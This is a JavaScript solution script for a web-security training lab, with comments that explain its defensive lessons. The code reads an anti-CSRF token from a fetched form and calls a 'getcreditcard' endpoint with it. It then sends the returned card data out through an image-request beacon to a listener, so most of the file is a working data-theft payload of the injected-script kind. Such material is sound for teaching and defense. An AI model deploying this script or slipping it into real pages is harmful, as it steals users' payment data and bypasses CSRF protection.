// Training-lab script: every URL it targets is on pentesteracademylab.appspot.com.
// It chains two GET requests and then sends the result to a listener on localhost:8000:
//   1. fetch the page behind the first link and read a token out of its form,
//   2. call the getcreditcard endpoint with the uid and that token,
//   3. copy the returned #result text into the page and send it out via an image request.
// Presumably it runs in the lab page's own origin (it reads the XHR response bodies,
// which a cross-origin page could not do without CORS) -- confirm against the lab setup.
//
// Defensive reading: an anti-CSRF token does not stop script that already executes in
// the page's origin, because that script can read the token straight from the form.
// The relevant controls are preventing the injection itself (output encoding, a
// restrictive script-src policy) and limiting img-src / connect-src so a value cannot
// leave the origin through an image beacon. An image request to an unexpected host
// with page data in its query string is also a useful detection signal.

// First anchor on the page: its href is fetched below, and the text after the first ':'
// in its label is used as the uid.
var x = document.querySelector('a');
var uid = x.innerText.split(':')[1];
var reqHandel = new XMLHttpRequest();

reqHandel.onreadystatechange = function () {
  // Act only on a completed, successful response.
  if (this.readyState != 4 || this.status != 200) {
    return;
  }

  // Parse the response in a detached <html> element so it can be queried like a document.
  var formPage = document.createElement('html');
  formPage.innerHTML = reqHandel.responseText;

  // The second <input> inside a form holds the value sent as csrf_token.
  var token = formPage.querySelectorAll('form input')[1].value;

  var cardUrl = 'http://pentesteracademylab.appspot.com/lab/webapp/jfp/19/getcreditcard?uid=' + uid + '&csrf_token=' + token;
  var cardReq = new XMLHttpRequest();

  cardReq.onreadystatechange = function () {
    if (this.readyState != 4 || this.status != 200) {
      return;
    }

    var cardPage = document.createElement('html');
    cardPage.innerHTML = cardReq.responseText;

    // Mirror the response's #result text into the live page's #result element.
    var resultBox = document.querySelector('#result');
    resultBox.innerText = cardPage.querySelector('#result').innerText;

    // Image loads are not blocked by the same-origin policy, so assigning src sends
    // the value as a query parameter to whatever host is named here.
    new Image().src = "http://localhost:8000/?user=" + resultBox.innerText;
  };

  cardReq.open('GET', cardUrl, true);
  cardReq.send();
};

reqHandel.open('GET', x.href, true);
reqHandel.send();